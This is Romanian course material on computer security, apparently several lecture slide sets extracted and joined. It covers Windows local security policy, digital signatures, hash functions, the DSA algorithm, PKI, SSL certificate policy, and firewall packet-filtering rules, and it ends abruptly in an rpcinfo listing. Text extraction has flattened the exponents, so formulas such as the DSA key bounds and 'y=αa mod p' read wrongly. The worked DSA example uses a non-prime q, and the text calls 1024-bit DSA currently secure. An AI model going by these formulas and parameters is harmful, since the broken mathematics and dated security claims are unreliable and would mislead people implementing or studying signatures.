Politicile de securitate Windows sunt foarte eficiente în protejarea mașinilor Windows prin
asigurarea accesului restricționat la utilizatori. Dacă politicile de securitate Windows nu sunt
configurate corect, utilizatorii pot manipula ușor registrul, applet-urile panoului de control, și alte
setări de sistem critice, ceea ce poate duce la blocarea sistemului. Prin urmare, configurarea în mod
corespunzător a politicilor de securitate pentru Windows în fiecare mașină windows din rețea este
foarte important (figura 8).
Politica de securitate locală a unui sistem este un set de informații cu privire la securitatea
unui calculator local. Informațiile politicii de securitate locale include următoarele:
1. Domeniile de încredere pentru a autentifica încercări de conectare.
2. Care conturi de utilizator pot accesa sistemul și cum. De exemplu, interactiv, printr-o
rețea, sau ca un serviciu.
3. Drepturile și privilegiile atribuite conturilor.
4. Politica de audit de securitate.

Figura 8. Politici de securitate privind utilizarea parolelor


Semnătura digitală. Sisteme de
certificare a cheilor publice

1. Semnătura digitală
2. Infrastructura cheilor publice (PKI)
3. Sisteme de certificare a cheilor publice
(SSL)
Semnătura digitală

• Definiţia şi rolurile semnăturii


digitale
• Sarcinile semnăturii digitale
• Algoritmul DSA (Digital Signature
Algorithm)
Definiţia semnăturii digitale
• O semnatura digitala este un bloc de date
alcătuit din cifre binare ce se ataşează unui
mesaj sau document pentru a întări încrederea
unei alte persoane care-l primeşte.
• O semnatura digitala reprezinta o informatie
care il identifica pe expeditorul unui document.
• Semnătura digitală e un atribut care confirmă că
documentul semnat este acesta pe care îl vedeţi
în acest moment, fără a putea să faceţi nici cea
mai mică schimbare în el - un spaţiu, o virgulă.
Semnătura digitală
• Semnaturile digitale utilizeaza criptarea
asimetrica, în care se foloseste o cheie pentru a
crea semnatura si o alta cheie, legata de prima,
pentru a o verifica.
• SD nu recunoaşte dreptul de proprietate asupra
textului transmis, ci doar că persoana semnatară
a avut acces la acel text şi la semnat .
• Atunci cînd semnarea este cuplată cu crearea
documentului, semnătura poate oferi o probă
evidentă a originii documentului.
Rolurile semnăturii
• Caracterul oficial al documentului
• Probă (în termeni de proprietar al
semnăturii)
• Eficienţă (claritatea şi finalitatea unui
document)
• Acord (măsura legalităţii şi autorizării)
Semnătura – atribuţii generale
• Să autentifice documentul. Semnătura trebuie să identifice
documentul pe care se găseşte, făcând astfel imposibilă falsificarea
acestuia;

• Să îl autentifice pe cel care semnează. Semnătura trebuie să


indice persoana care a semnat un document, înregistrare sau
mesaj, şi trebuie să fie foarte dificil pentru o altă persoană să o
reproducă;

• Să fie un act afirmativ. Semnatura stabileşte că o tranzacţie a fost


realizată legal;

• Eficienţă. Semnătura şi procesele de creare şi verificare trebuie să


furnizeze siguranţă maximă atât în autentificarea celui care
semnează, cât şi a documentului, cu un consum de resurse cât de
mic.
Sarcinile SD
• Confidenţialitate
• Autentificare
• Integritate
• Autorizare
• Non-Repudiere
Functia Hash
• Functie “one-way” care mapeaza valori
dintr-un domeniu larg (lungime variabila)
intr-o valoare (rezumat) de lungime fixă
• Daca y = f(x), atunci este foarte greu de
calculat: x = f-1(y) – rezistența la coliziune
• La o minora schimbare in input va produce
la output o valoare hash total diferita.
Functia Hash
• Pentru asigurarea integrității datelor, se folosesc
algoritmii Message Digest (MD) și Secure Hash
Algorithm (SHA) – implementati in diferite
variante de-a lungul timpului:
• MD4;
• MD5;
• SHA-0, SHA-1
• SHA-2 (SHA-224, SHA-256, SHA-384,SHA-512)
• RIPEMD-160
Functia Hash. Alg. Merkle-
Damgard
• O funcție hash trebuie să fie capabilă să
proceseze un mesaj de lungime variabilă și să
furnizeze o ieșire de lungime fixă.
• Acest lucru se realizează prin împărțirea
mesajului într-o serie de blocuri de dimensiuni
egale și procesarea succesivă a acestora
folosind o funcție ireversibilă.
• Această funcție se caracterizează prin faptul ca
convertește cele două intrări de lungimi diferite,
într-o ieșire de lungime egală cu una din intrările
sale.
Functia Hash. Alg. Merkle-
Damgard
• De exemplu, dacă funcția F are o intrare
de 128 biți și alta de 256 biți – va furniza la
ieșire 128 biți.
• Ultimul bloc procesat trebuie să fie urmat
de un alt bloc de extindere, cu ajutorul
căruia este mascată lungimea reală a
acestuia – lucru important pentru
securitatea algoritmului
Functia Hash. Alg. Merkle-
Damgard
Crearea şi verificarea semnăturii
• Alice intenţionează să semneze un mesaj
• Va calcula o valoare-rezumat a mesajului, determinată
printr-o funcţie de dispersie (hashing)
• Apoi Alice va utiliza o cheie privată KS pentru a cripta
valoarea-rezumat a mesajului
• Rezultatul, care este semnătura sa pe mesaj, se
ataşează mesajului
• Bob va recepţiona mesajul
• El poate valida semnătura lui Alice făcînd apel la cheia ei
publică KP
• Se va testa dacă valoarea-rezumat determinată de Bob
este aceeaşi cu valoarea codificată prin semnătura lui
Alice
Crearea şi verificarea semnăturii
Semnare + Criptare
• Alice generează o cheie aleatoare a mesajului, K
• Alice criptează mesajul M cu cheia K obţinînd MC
• Alice criptează cheia K folosind cheia publică a lui Bob,
obţinînd KC
• Alice procesează o semnătură S folosind cheia sa
privată
• Alice transmite către Bob KC, MC, S
• Bob foloseşte cheia sa privată pentru a decripta KC şi a
obţine K
• Bob foloseşte K pentru decriptarea MC şi obţinerea
textului clar M
• Bob foloseşte cheia publică a lui Alice pentru validarea
semnăturii S
Semnare + Criptare
Algoritmul DSA - Digital Signature Algorithm

• DSS a fost propusa initial de catre NIST cu lungimea cheii de 512


biti.
• Dupa multe polemici asupra faptului ca nu este destul de sigur, în
special pe termen lung, NIST a revizuit DSS pentru a accepta chei
de lungime pâna la 1024 biti.
• În prezent, DSA este considerat sigur cu chei de lungime 1024 biti.
• DSA se bazeaza pe problema logaritmului discret în anumite
subgrupuri ale unui corp finit pentru un anumit numar prim p.
• Problema a fost propusa prima data (în scop criptografic) în anul
1989, de catre Schnorr .
• Nu au fost raportate atacuri eficiente pentru aceasta forma a
problemei logaritmului discret.
• Unii cercetatori au avertizat de existenta anumitor numere prime
• periculoase (`trapdoor' primes) care ar permite ca o cheie sa fie
`sparta' cu usurinta.
• Aceste numere prime sunt rare si pot fi usor evitate daca
implementarea procedurii de generare a cheii este corecta.
Algoritmul DSA

• DSA produce semnaturi mici (320 biti) si, astfel, este des
folosita în situatiile în care memoria disponibila este
limitata (smartcard-uri, telefoane mobile etc.).
• La DSA, generarea semnaturii este mult mai
rapida decât verificarea ei.
• Se poate spune ca este avantajos ca semnarea sa fie
rapida, dar în multe aplicatii se semneaza de obicei o
singura data, iar semnatura e verificata des.
• În acest caz, ar fi mai avantajos sa avem o verificare a
semnaturii mai rapida.
• Multi autori, printre care si Naccache,
au încercat sa dezvolte tehnici pentru îmbunatatirea
eficientei DSA, atât pentru semnare, cât si pentru
verificare.
Algoritmul DSA

Algoritmul constă în determinarea unei serii de


chei publice, respectiv private, cu ajutorul cărora
are loc semnarea documentelor de către autor,
iar mai apoi documentul este autentificat. Astfel
distingem 3 etape în procesul de
semnare/autentificare:
– generarea cheilor
– semnarea propriu-zisă
– validarea (autentificarea).
Algoritmul DSA. Crearea cheilor
Entitatea A îsi creeaza o cheie publica si o cheie privata corespunzatoare;
1. Se genereaza un numar prim q astfel încât 2159 < q < 2160;

2. Se alege un numar întreg t si un numar prim p, unde 2511+64t < p <


2512+64t, cu proprietatea ca q divide p-1;

3. Se selecteaza un element a de ordin q din Z*p;

a) Se selecteaza un element g din Z*p, ord(g)=p-1, si calculeaza α = g(p-


1)/q mod p;

b) Daca α = 1 atunci se repeta pasul 3. 1;


4. Se alege un întreg a astfel încât 1 < a < q-1;5. Se calculeaza y=αa mod p;
5. Cheia publica a lui A este (p, q, α, y);

Cheia privata este a.


Algoritmul DSA. Generarea și
verificarea semnaturii
Entitatea A semneaza un mesaj binar m de lungime arbitrara. O alta entitate
B va folosi cheia publica a lui A pentru a verifica semnatura;

1. Generarea Semnaturii. A va parcurge pasii:


a) Se alege aleator un întreg secret k, 0 < k < q;
b) Se calculeaza r = (ak mod p) mod q;
c) Se calculeaza k-1 mod q;
d) Se calculeaza s = k-1 {h(m)+ar} mod q;
e) Semnatura lui A pentru mesajul m este perechea (r, s).

2. Verificarea Semnaturii. Pentru a verifica semnatura lui A, (r, s), B va


parcurge pasii:
a) Se obtine cheia publica a lui A, (p, q, α, y);
b) Se verifica daca 0 < r < q si 0 < s < q; în caz contrar, respinge semnatura;
c) Se calculeaza w=s-1 mod q si h(m);
d) Se calculeaza u1=w·h(m) mod q si u2=rw mod q;
e) Se calculeaza v=(αu1yu2 mod p) mod q;
f) Se accepta semnatura doar daca v=r.
Corectitudinea semnaturii

Daca (r, s) este o semnatura legitima a entitatii A asupra mesajului m, atunci


h(m) +ar k (mod q) este adevarata.

Înmultind ambele parti cu w, obtinem w ·h(m) + arw k (mod q).

Dar w ·h(m) = u1, rw=u2.


Înlocuind, obtinem u1+au2 k (mod q).
Ridicam la ambele parti si obtinem (au1yu2 mod p) mod q = (ak mod p) mod
q.

Prin urmare v=r.


Exemplu (Semnatura DSA)Crearea cheilor:

• Entitatea A alege p = 1295556481 si q = 145896 astfel încât q divide p-1;


aici (p-1)/q= 8880.
• A alege g = 1124266021 si calculeaza a = g8880 mod p = 625833668.
• Din moment ce a diferit de 1, îl vom pastra.
• În continuare, A alege a = 137623 si calculeazay=aa mod p = 873234058.
Cheia publica a lui A este (p = 1295556481, q = 145896, α =625833668,
y=873234058).
• Cheia privata a lui A este a=137623.
• Generarea Semnaturii:
• Pentru mesajul m, A calculeaza r=30462 si s=47587, unde h(m) =56908383
1021078013872036425494296265110068199691. Semnatura lui A este(r=
30462, 47587).
• Verificarea Semnaturii:
• Pentru verificarea semnaturii, B calculeaza w=s-1 mod q = 21547, u1=w
·h(m) modq = 8105, u2 = rw mod q = 124506. Apoi B calculeaza v=(au1yu2
mod p) modq=(6258336688105873234058124506 mod 1295556481) mod
145896=30462. Din moment ce v=r, vom accepta semnatura.
Sisteme de certificare
a cheilor publice

• Infrastructura cheilor publice (PKI


– Public Key Infrastructure )
• Componentele şi funcţiile PKI
• Avantajele PKI
PKI - Public Key Infrastructure
• PKI este o combinaţie de produse
hardware şi software, politici şi proceduri
care asigură securitatea de bază necesară
astfel încât doi utilizatori, care nu se
cunosc sau se află în puncte diferite de pe
glob, să poată comunica în siguranţă. La
baza PKI se află certificatele digitale, un
fel de paşapoarte electronice ce mapează
semnătura digitală a utilizatorului la cheia
publică a acestuia
PKI - Public Key Infrastructure
PKI îşi propune să rezolve probleme
manageriale din domeniul cheilor publice,
integrînd semnături şi certificate digitale cu
o mare diversitate de alte servicii specifice
comerţului electronic, şi prin care se
solicită oferirea integrităţii, controlului
accesului, confidenţialităţii, autentificării şi
a nerepudierii tranzacţiilor electronice.
PKI
• Criptografia bazată pe chei publice trebuie
însoţită de un set de politici de definire a
regulilor sub care sistemele de criptografie pot
opera şi de un set de proceduri care specifică
modalităţile de generare, distribuţie şi utilizare a
cheilor.
• Public Key Infrastructure (PKI) stabileşte cadrul
funcţional, bazat pe standarde, pentru o mare
varietate de componente, aplicaţii, politici şi
practici.
Componentele PKI
• Autoritatea Certificatoare (CA): responsabilă de
generarea şi revocarea certificatelor
• Autoritatea Registratoare (RA): responsabilă de
verificarea construcţiei generate de cheile publice şi
identitatea deţinătorilor.
• Deţinătorii de Certificate (subiecţii): Oameni, maşini sau
agenţi software care deţin certificate şi le pot utiliza la
semnarea documentelor.
• Clienţii: ei validează semnătura digitală şi certificarea de
la un CA.
• Depozitele: stochează şi fac accesibile certificatele şi
Listele de Revocare a Certificatelor (CRLs -Certificate
Revocation Lists)
• Politicile de securitate: definesc procesele şi principiile
de utilizare a criptografiei.
Funcţiile PKI
• Înregistrarea: este un proces în care cel ce doreşte să
obţină un certificat de la CA îşi prezintă atributele sale.
Acestea sunt verificate iar apoi se eliberează certificatul.
• Generarea Cheilor: în multe cazuri subiectul generează
o pereche de chei în mediul său, înainte de a transmite
cheia publică la CA pentru certificare. Dacă CA
răspunde pentru generarea cheilor, acestea sunt oferite
subiectului ca un fişier criptat sau token fizic asemeni
unui smartcard.
• Certificarea: este procesul în care CA eliberează
certificatul ce conţine cheia publică subiectului apoi îl
depune într-un depozit public.
Funcţiile PKI
• Recuperarea Cheilor: în unele implementări PKI
necesită ca toate cheile schimbate şi/sau
criptate să fie depuse într-un depozit securizat.
Ele sunt recuperabile dacă subiectul pierde
cheia, acest lucru revenind lui CA sau sistemului
de recuperare.
• Actualizarea Cheilor: toate cheile perechi şi
certificatele lor asociate trebuie actualizate la un
interval regulat. În acest sens există două situaţii
care necesită acest lucru:
Actualizarea Cheilor
În acest sens există două situaţii care necesită acest
lucru:
• Data care este specificată în certificat ca dată de
expirare este depăşită şi se actualizează.
• Cheia privată a uneia din entităţi din PKI este
compromisă. În acest caz PKI trebuie să anunţe că
vechiul certificat nu mai este valid şi urmează să-l
înlocuiască. Una din căi este de pre-generare şi stocare
securizată a perechilor de chei pentru astfel de situaţii,
acţiune ce duce la informarea fiecărui utilizator de acest
lucru. Altă cale este metoda "out-of-band" unde cu
ajutorul telefonului, faxului, scrisorii se transmite acea
cheie.
Funcţiile PKI
• Certificarea încrucişată: permite utilizatorilor
dintr-un domeniu administrativ să utilizeze
certificate generate de un CA operaţional în alt
domeniu. Procesul implică un CA (CA_1) ce
oferă o certificare pentru alt CA(CA_2). Acest
certificat conţine cheia publică CA asociată cu
cea privată pe care CA_1 o utilizează, lucru ce
permite subiecţilor certificaţi prin CA_2 să
accepte certificatele generate de CA_1 sau orice
CA subordonat.
Funcţiile PKI
• Revocarea: apare în momentul expirării
perioadei de validitate care poate apărea
când: subiectul îşi schimbă numele,
angajatul părăseşte compania, cheia
privată este compromisă. În cadrul
standardului X.509, pentru a revoca un
certificat se utilizează Lista Revocărilor
Certificatelor (CRL - Certificate Revocation
List). Această listă identifică certificate şi
sunt semnate de CA.
Avantajele PKI
Securizarea mesageriei electronice
• Cea mai mare parte a interacţiunilor derulate
prin Internet se realizează prin intermediul
mesageriei electronice. Această activitate
presupune însă acceptarea unui grad ridicat de
risc, prin expunerea unor informaţii confidenţiale
şi prin posibilitatea substituirii autorului unui
mesaj sau chiar alterarea voită a conţinutului
mesajului.
Avantajele PKI
Sistem de administrare a documentelor şi
semnătură digitală
• O parte importantă a aplicaţiilor software se
referă la procesarea şi arhivarea documentelor
în format electronic. Deşi aceste sisteme
contribuie la diminuarea dificultăţilor în
prelucrarea şi arhivarea unui volum mare de
documente, ele nu rezolvă complet trecerea de
la documente în format tradiţional la documente
electronice. Ceea ce lipseşte este posibilitatea
de a semna aceste documente electronice şi de
a asigura în acest fel non-repudierea acestora.
Avantajele PKI
Securizarea aplicaţiilor Intranet şi Extranet
• Din ce în ce mai multe companii şi organizatii
tind să-şi transfere procesele de interacţiune
către aplicaţii care rulează în mediul Internet. Pe
măsură ce aceste informaţii sunt transferate
către sistemele şi aplicaţiile Intranet/Extranet,
riscul de securitate informaţională creşte
semnificativ, în primul rând datorită faptului că
Internetul reprezintă prin natura sa un mediu
public.
Avantajele PKI
Criptarea datelor şi a documentelor
• Securitatea datelor nu se referă numai la
momentul în care acestea sunt utilizate într-un
proces informaţional, ci şi la stocarea lor.
Păstrarea confidenţialităţii şi integrităţii acestora
îmbracă numeroase aspecte, care se referă atât
la autentificarea accesului cât şi la criptarea lor
astfel încât să nu poată fi utilizate în cazul unui
acces neautorizat.
Avantajele PKI
Autentificare la nivelul sistemului de operare şi
al aplicaţiilor
• Autentificarea prin nume şi parolă este soluţia
cea mai vulnerabilă şi în plus, obligă utilizatorul
la memorarea unei astfel de combinaţii pentru
fiecare aplicaţie folosită. Folosirea certificatului
digital stocat pe smartcard contribuie nu numai
la creşterea gradului de siguranţă dar şi la o
utilizare mai facilă, prin folosirea unui mijloc unic
de autentificare pentru toate aplicaţiile folosite
Politica de utilizare
a certificatelor SSL

• Scopul şi sarcinile SSL


• Certificatul SSL
• Revocarea certificatelor SSL.
Certificatul digital

• Certificatul digital este utilizat pentru o


gama variata de de tranzactii electronice
ce include e-mail, comertul electronic. In
mod obisnuit, comertul electronic impune
si utilizarea unui certificat pentru
securizarea serverului.
• Certificatul digital reprezinta un instrument
in stabilirea unui canal securizat pentru
comunicarea informatiilor confidentiale.
Politica de utilizare
a certificatelor SSL

• Politica de utilizare a certificatelor SSL,


eliberate de Centrul de Certificare a
Cheilor Publice (în continuare CCCP),
conţine prevederile de bază, legate de
aspectele normative şi operaţionale în
utilizarea certificatelor SSL
Scopul utilizării
Certificatele SSL sunt utilizate în scopul creării
canalelor securizate de transmitere a datelor
prin intermediul protocoalelor TLS/SSL.
Utilizarea certificatelor SSL asigură:
• Autentificarea serverului. clientul se autentifică
în dependenţă de algoritm, serverul se
autentifică permanent.
• Confidenţialitatea mesajului. Datele transmise
nu pot fi vizualizate sau interceptate de
persoane terţe.
• Integritatea datelor. Datele sunt transmise
integral şi nu pot fi schimbate sau pierdute.
Sarcini principale
Principalele sarcini ale certificatului SSL sunt:
• determină dacă site-ul web aparţine anumitei
companii; certificatul SSL poate conţine
informaţii despre compania, căreia i-a fost
eliberat certificatul, numele de domen,
amplasarea, adresa juridică şi e-mail, numărul
de înregistrare şi valabilitatea certificatului;
• criptează conexiunea între utilizator şi server; în
timpul unei sesiuni de comunicare, are loc
schimbul de chei cu scopul transmiterii
informaţiei criptate prin intermediul Internetului.
Sarcini suplimentare
• contribuie la prevenirea phishingului şi
altor atacuri cibernetice;
• asigură asistenţă companiilor, care pot
deveni ţintă ale atacurilor de tip fishing şi a
altor fraude on-line, oferind instrumente
pentru a confirma apartenenţa site-lui web
anumitei companii şi legalitatea lui;
• oferă ajutor organelor de drept în
investigarea fraudelor cibernetice.
Garanţii şi Fiabilitate
• CCCP garantează faptul că informaţia
indicată în certificat corespunde
documentelor oficiale prezentate de către
abonat;
• la momentul depunerii documentelor
necesare abonatul deţine dreptul exclusiv
asupra numelui de domen;
• CCCP asigură accesul on-line 24/7 la lista
certificatelor SSL revocate.
Eliberarea certificatelor SSL

• CCCP este organul abilitat să elibereze


certificatul SSL la cererea solicitantului.
Solicitantul generează perechea de chei şi
se adresează la CCCP. După verificarea
şi aprobarea documentelor depuse CCCP
eliberează certificatul SSL.
Eliberarea certificatelor SSL
• Notificarea oficială cu privire la faptul că a
fost eliberat certificatul SSL este
publicarea acestui certificat în Repozitoriu.
În cazul verificării pozitive a cererii pentru
certificatul SSL, solicitantul primeşte
răspunsul pozitiv prin emiterea
certificatului SSL. CCCP poate expedia
solicitantului un aviz de eliberare a
certificatului SSL prin intermediul poştei
electronice sau prin telefon.
Certificatul SSL
Version Versiunea V3
Serial Numărul de înregistrare Număr aleator
Number a certificatului
Issuer Datele de identificare a N = Numele, prenumele persoanei împuternicite a centrului
centrului de certificare, de certificare, IDNP
emitentul certificatului CN = Denumirea centrului de certificare
L = Localitate
S = Stat
OU = Subdiviziunea emitentului
O = Denumirea emitentului, IDNO
P = Telefonul de contact a persoanei împuternicite a
centrului de certificare
PostalCode = Codul poştal al emitentului
STREET= Adresa juridică emitentului
T = Funcţia persoanei împuternicite a centrului de certificare
C = Codul statului
E = Poşta electronică a persoanei împuternicite a centrului de
certificare
Certificatul SSL
Valid Perioada de valabilitate Valabil din: «__» ______ 20__ hh:mm:ss GMT
from a certificatului
Valid to Perioada de valabilitate Valabil pînă la: «__» ______ 20__ hh:mm:ss GMT
a certificatului
Subject Datele de identificare a E = Poşta electronică persoanei responsabile a persoanei
titularului certificatului juridice
P = Telefonul de contact a persoanei responsabile a
persoanei juridice
CN = Denumirea numelui de domen
PostalCode= Codul poştal a adresei juridice a persoanei
juridice
STREET= Adresa juridică a persoanei juridice
OU = Subdiviziunea persoanei juridice
O = Denumirea persoanei juridice, IDNO
L = Localitate
S = Stat
C = Codul statului
Certificatul SSL
Câmpuri alternative ale certificatelor
Câmpuri alternative
Issuer Alternative Numele alternativ al emitentului URL emitentului
Name

Authority Information Acces la informaţiile centrului de URL pentru stabilirea statutului certificatului
Access certificare

Key Usage Utilizarea cheii Non-repudierea, semnătura digitală, criptarea cheilor, key
agreement
Extended Key Usage Utilizarea extinsă a cheii Autentificarea serverului

Netscape Cert Type Tipul certificatului Netscape SSL-autentificarea serverului

Subject Key Identificatorul cheii titularului Identificatorul cheii private, corespunzătoare cheii publice
Identifier certificatului certificate
CRL Distribution Punctul distribuiţie a listei Sursa de publicare a listei certificatelor revocate
Point certificatelor revocate

Basic Constraints Constrîngeri de bază Determină tipul subiectului şi constrîngerea la lungimea


lanţului de certificare
Thumbprint algorithm Algoritmul „amprentei” Denumirea algoritmului

Thumbprint „Amprenta” „Amprenta”


PROCEDURA DE REVOCARE A
CERTIFICATELOR SSL
• Revocarea certificatului SSL se
efectuează prin depunerea cererii de
revocare la CCCP. Din momentul primirii
şi aprobării cererii de revocare a
certificatului SSL, CCCP este obligat în
termen de 3 ore lucrătoare să efectueze
procedura dată. Notificarea oficială cu
privire la revocarea certificatului SSL se
consideră publicarea în lista certificatelor
revocate.
Cauzele revocării certificatelor SSL
CCCP revocă certificatul în următoarelor cazuri:
• la cererea titularului certificatului,
• în cazul compromiterii cheii private,
• efectuarea modificărilor în certificatul cheii
publice,
• la decizia CCCP (în cazul în care abonatul
încalcă prevederile CPP şi Politicii de utilizare a
certificatelor SSL sau cerinţele altor documente
de reglementare, publicate de CCCP),
Cauzele revocării certificatelor SSL
• în momentul în care CCCP îşi suspendă activitatea în
domeniul semnăturii digitale, toate certificatele valabile
eliberate şi publicate, într-un termen determinat vor fi
revocate paralel cu certificatul CCCP,
• atunci cînd abonatul reţine sau ignoră achitarea
serviciilor de certificare,
• în cazul în care încrederea faţă de gradul de fiabilitate a
cheii private a CCCP a fost subminată,
• în cazul concedierii abonatului – persoana responsabilă
a persoanei juridice, la cererea abonatului sau a
persoanei juridice,
• dacă s-a depistat că există erori în datele indicate în
cererea de certificare sau în certificat.
Cheia privată a certificatului SSL şi
utilizarea ei

• Utilizarea certificatelor trebuie să fie în


strictă conformitate cu prevederile politicii
de utilizare a certificatelor SSL şi
conţinutului extensiei cîmpurilor KeyUsage
(„Utilizarea cheii”) (e.g., în caz dacă nu
este bifat „Criptarea cheilor”, utilizarea
certificatului pentru autentificare nu este
admisă)
Cheia publică a certificatului SSL şi
utilizarea ei
Pentru a avea încredere în certificatul SSL şi înainte de
utilizarea acestuia, titularul certificatului trebuie să
stabilească:
• aplicabilitatea şi oportunitatea utilizării certificatului SSL
cu un anumit scop. Totodată titularul certificatului SSL
trebuie să fie sigur că va fi utilizat în scopuri ce nu
contrazic cerinţelor Politicii de utilizare a certificatelor
SSL. CCCP nu poartă răspundere pentru determinarea
aplicabilităţii şi oportunităţii de utilizare a certificatului
SSL,
• faptul că certificatul SSL va fi utilizat în conformitate cu
extensiile cîmpurilor sale KeyUsage („Utilizarea cheii”).
Firewall, definitie, caracteristici

Definitie:
• Numim firewall un echipament care examineaza traficul si ia
deciziile pentru controlul accesului.
• Uzual spunem ca realizeaza filtrarea datelor

Caracteristici:
• Separa reteaua sigura de rest
• Permite trecerea numai a traficului autorizat
• Actioneaza ca o bariera intre “noi” si rest
• Limiteaza comunicatia din afara retelei, chiar daca lumea exterioara
este o alta parte a aceleiasi organizatii
• Prin ascunderea dupa firewall numai cateva masini ale organizatiei
sunt expuse atacurilor

1
Utilizare firewall

Motivatie:
• Exista brese de securitate datorate bugurilor software (prezente si in
software de securizare)
• Codul rulat pentru implementarea firewall este restrans -> numarul bugurilor
posibile este foarte mic
• Administrarea firewall este supusa unui set de reguli stricte
• Firewall forteaza partitionarea retelei in domenii de securitate diferite
• Firewall executa putine instructiuni, suport pentru loguri si monitorizari
• Fara partitii o retea este vazuta ca o masina virtuala uriasa cu un set
necunoscut de utilizatori obisnuiti si privilegiati
Observatii:
• Nu este o solutie la problemele retelei, ci un raspuns la problemele de
securitate ale masinilor din retea
• Nu stie cum se produce un software sigur, corect si usor de administrat
• Protocoalele de retea “sigure” nu inlocuiesc firewall.
• Nicio metoda criptografica nu poate proteja impotriva codului cu buguri.
2
Avantaje firewall

• Ruleaza pe servere sau echipamente de retea


• Software conservativ, nu necesita tehnologie “ultimate”
• Pastreaza orice log dorim in functie de reguli
• Poate opera la diferite niveluri ale stivei de retea (link, network,
application)
• Examineaza headerele pachetelor la nivelul corespunzator
• Este transparent (spre deosebire de proxy)

Statefull versus stateless;


• “Statefull”- un produs care se uita in fiecare pachet si aplica regulile,
insa regulile sau testele aplicate la fiecare pachet pot fi modificate in
functie de pachetele care au fost deja procesate.
• “Stateless” – un produs care se uita la fiecare pachet si aplica
regulile independent de pachetele precedente, determinand cand
inainteaza sau elimina pachetul independent pe baza unui set de
reguli prestabilit

3
Structura schematica

Componente:
• Interior – oricine din interior este presupus a fi bine intentionat
• Exterior – cei rau intentionari sunt plasati aici
• DMZ – se plaseaza serverele neecesare, dar potential periculoase
aici.

Filtru Filtru

Interior Gateway(s) Exterior

DMZ

4
Caracteristici

1. Demilitarized Zone – DMZ. Daca discutam din perspectiva serverului


de mail sau web rezulta:
• Cei din exterior pot trimite email, accesa pagini web
• Cei din interior pot obtine emailurile, actualizare pagini web
• Masinile trebuie monitorizate cu mare atentie
2. Forteaza politici de limitari administrative, nu fizice
3. Filozofie firewall:
• Blocheaza toate destinatiile periculoase – Utilizata cand exista
cunostinte despre existenta unor potentiale pericole in anumite parti
ale retelei
• Blocheaza orice cu exceptia pachetelor cunoscute ca fiind sigure si
necesare – mult mai sigura.
• Blocarea traficului de iesire. Daca se permite trafic de iesire o serie
de elemente trebuie avute in vedere: existenta persoanelor rau
intentionate in interior, cerinte de reglementare interna, politici ale
corporatiei.

5
Tipuri de firewall

Tipuri de firewall:
– Filtrarea de pachete
– Filtrarea dinamica a pachetelor
– Gateway pentru aplicatii
– Comutarea circuitelor
– Firewall personale si/sau distribuite

Obs: Majoritatea implementarilor firewall sunt combinatii ale acestor


tipuri

6
Filtrarea pachetelor

• Filtrele sunt realizate cu ajutorul ruterelor, sunt ieftine

• Nu sunt utilizate informatii de context sau conexiune, pachetele


individuale sunt acceptate sau rejectate

• Sunt greu de stabilit reguli avansate de filtrare, unele sunt


inadecvate si regulile diferite pot interactiona

• Filtrarea pachetelor nu este adecvata pentru unele protocoale

• Gestionarea accesului la servicii dinamice este greoaie

7
Stateless packet filtering

• Dorim sa permita conexiunile in exterior

• Permit pachetele generate ca raspuns

• Pentru comunicatie TCP aceasta poate fi realizata fara stare;


– Primele pachete intr-o conexiune TCP are numai bitul SYN setat;

Obs: La cererea unei legaturi clientul transmite un pachet cu bitul SYN setat si
numar secventa 0 in headerul TCP. Serverul raspunde cu un pachet
SYN_ACK, pachet in care sunt setati bitii SYN si ACK. Apoi clientul
transmite o confirmare cu ACK catre server si se considera conexiunea
stabilita.
– Toate celelalte pachete au bitul ACK setat

Solutie: Permite toate pachetele cu ACK setat


8
Reguli firewall

• Action:
– Permit (Pass, Allow) – permite inaintarea pachetului;
– Deny (Block) – elimina pachetul;

• Direction:
– Source - de unde vine pachetul: <IP address, port>;
– Destination – unde merge pachetul: <IP address, port>;

• Protocol:
– TCP;
– UDP;

• Indicatori (flags) pachete;


– ACK;
– SYN;
– RST, etc.

9
Exemplu reguli setare firewall

Presupunem ca dorim sa blocam spammer si sa permitem oricui sa


trimita mail la propriul server de mail (OUR-MAIL);

• Block: Source IP Address = SPAMMER

• Allow: Source IP Address = any


and
Source port = any
and
Destination IP Address = OUR-MAIL
and
Destination port = 25

10
Exemplu: Setare incorecta

• Cerinta: Dorim sa permitem toate conexiunile TCP la serverele de


mail

Allow: Source IP Address = any


and
Source port = 25
and
Destination IP Address = any
and
Destination port = any

• Problema: Nu putem controla selectia portului la masina remote si


orice proces de la portul sursa 25 este permis

11
Exemplu: Alegere corecta

• Allow: Source IP Address = any


and
Source port = any
and
Destination IP Address = any
and
Destination port = 25

• Rezultat: Permite apelurile care pleaca

12
Exemplu: Crearea unui filtru propriu

• Cerinta: In politica companiei s-a decis ca nu se permite angajatilor


web browsing

• Rezolvare:
– Se creaza un filtru care elimina navigarea web pentru toate
masinile din interiorul companiei.
– Se presupune ca toate adresele IP in companie sunt cunoscute.
– Pachetele iesite la portul 80 (web servers)

Obs: Filtrarea pachetelor In-bound. Daca filtram pachetele care pleaca


la DMZ trebuie sa spunem de unde vin aceste pachete

13
Filtrare UDP

Particularitati:
• La UDP nu exista notiunea de conexiune si ca urmare este imposibil
a se distinge raspunsul de o cerere, care ar trebui permis, fata de un
pachet malitios.
• Address spoofing este fara conexiune

O prima metoda: O metoda care pare buna este blocarea tuturor


porturilor cunoscute ca fiind periculoase.

Alta solutie: Permiterea pachetelor UDP numai prin intermediul


serverelor sigure cunoscute.

14
Exemplu UDP: DNS

Pentru filtrarea pachetelor UDP ce permit acces la DNS sunt necesare:

• Acceptarea cererilor la portul 53

• Block daca manipuleaza numai cereri interne

• Allow daca permite cereri externe

• Problema cererilor recursive se poate aplica una dintre strategiile


– Legarea socketului local de raspuns cu vreun alt port: permite
accesul spre interior a pachetelor UDP
– Accesarea masinii DNS in DMZ

15
Probleme ICMP si RPC

Pachetele ICMP:
• Pot fi generate ca raspuns la pachete TCP sau UDP: exemplu
raspunsul “Path MTU”
• Trebuie sa fie permise cand avem conectivitate cat si la intreruperea
sa
Concluzie: Simpla filtrare a pachetelor nu poate realiza aceste lucruri.

La RPC:
• Serviciile RPC se leaga de numere de port aleatoare;
• Nu exista nici un mod de a cunoaste apriori porturile care sa fie
blocate si care sa fie permise
• Aceleasi probleme apar si la clientii RPC
Concluzie : Sistemele care utilizeaza RPC nu pot fi protejate prin
simpla filtrare a pachetelor.

16
O abordare incorecta

Blocarea unui set de porturi UDP. Rapunsul la rpcinfo –p nume_host

Program Versiune Protocol Port serviciu


100000 4 tcp 111 rpcbind
100000 2 udp 111 rpcbind
390113 1 tcp 7937
100005 1 udp 32800 mountd
100005 3 tcp 32776 mountd
